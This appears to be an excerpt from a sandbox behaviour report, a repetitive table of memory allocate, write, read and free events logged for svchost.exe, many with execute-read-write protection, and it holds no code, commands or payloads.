| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20016, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3e8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 6 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20016, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3f0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 12 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001c, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a3f8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 14 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001e, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a400, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a408, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 9 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20019, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a410, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 15 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001f, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a418, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 7 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20017, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a420, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28e008, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678168 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 25 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28dc18, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2677704 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28dc78, free_type = MEM_RELEASE, size = 2677864 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20029, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28dda8, free_type = MEM_RELEASE, size = 2678176 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 21 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20025, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a078, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 24 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20028, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a080, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 20 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20024, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a088, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 19 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20023, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a090, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 13 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001d, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a098, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 24 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20028, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0a0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 10 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x2001a, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0a8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 17 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20021, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0b0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 18 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20022, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0b8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 17 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20021, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0c0, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 25 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28de68, free_type = MEM_RELEASE, size = 2678360 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x20029, size = 8 |
|
1 | |
| Memory | Free | process_name = C:\Windows\system32\svchost.exe, address = 0x28df98, free_type = MEM_RELEASE, size = 2678688 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x14002a0c8, size = 8 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28df78, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678696 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20010, size = 17 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x20000, size = 16 |
|
1 | |
| Memory | Read | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
| Memory | Allocate | process_name = C:\Windows\system32\svchost.exe, address = 0x28de08, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 2678200 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0xe0000, size = 48 |
|
1 | |
| Memory | Write | process_name = C:\Windows\system32\svchost.exe, address = 0x60000, size = 72 |
|
1 | |
